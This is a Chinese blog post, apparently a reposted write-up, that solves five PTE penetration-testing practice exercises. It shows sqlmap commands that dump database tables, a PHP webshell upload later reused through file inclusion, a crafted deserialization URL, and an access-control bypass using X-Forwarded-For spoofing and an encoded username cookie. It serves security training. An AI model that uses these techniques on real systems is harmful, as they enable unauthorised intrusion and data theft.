PTE练习题解答

admin 2022年6月10日16:35:08评论115 views字数 676阅读2分15秒阅读模式

1.SQL注入

PTE练习题解答

直接sqlmap跑一下

python sqlmap.py -u url --dbs

PTE练习题解答

爆个表

python sqlmap.py -u url -D 2web --tables

PTE练习题解答

爆列

python sqlmap.py -u url -D 2web -T IS_KEY --columns

PTE练习题解答

接下来查看下内容

python sqlmap.py -u url -D 2web -T IS_KEY -C haha --dump

PTE练习题解答

拿到key1:abcd1234

2.文件上传

PTE练习题解答

发现是php的页面

PTE练习题解答

发现上传失败,改改

PTE练习题解答

改完传好了

PTE练习题解答

找到路径,直接访问下

PTE练习题解答

PTE练习题解答

蚁剑连接

PTE练习题解答

找到key.php,打开找到key2:a1b2c3d4

PTE练习题解答

3.文件包含

PTE练习题解答

查看url发现,强制添加.txt后缀

PTE练习题解答

把第二题马改成.txt后缀的

PTE练习题解答

访问下看看

PTE练习题解答

返回题目访问下

PTE练习题解答

蚁剑连接

PTE练习题解答

找key

PTE练习题解答

找到key3:abcdefgh

PTE练习题解答

4.反序列化

PTE练习题解答

来看一下php类型反序列化格式

s:3:"123";
<?php
echo serialize("123");
?>

PTE练习题解答

编辑器看下文字长度

PTE练习题解答

编辑下url

http://121.36.208.140:8894/start/index.php?str=s:44:"Whatever is worth doing is worth doing well.";

运行下得到key4:123456768

PTE练习题解答

5.失效的访问控制

PTE练习题解答

bp抓包访问下

发现只允许本地访问

改下

X-Forwarded——For:127.0.0.1

PTE练习题解答

发现没有查看权限

PTE练习题解答

发现username为url编码--->base64

PTE练习题解答

bp解下码

PTE练习题解答

然后把admin编码

PTE练习题解答

复制替换拿到key5:12345678

PTE练习题解答

结束


原文始发于微信公众号(CTS纵横安全实验室):PTE练习题解答

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月10日16:35:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   PTE练习题解答http://cn-sec.com/archives/1105408.html

发表评论

匿名网友 填写信息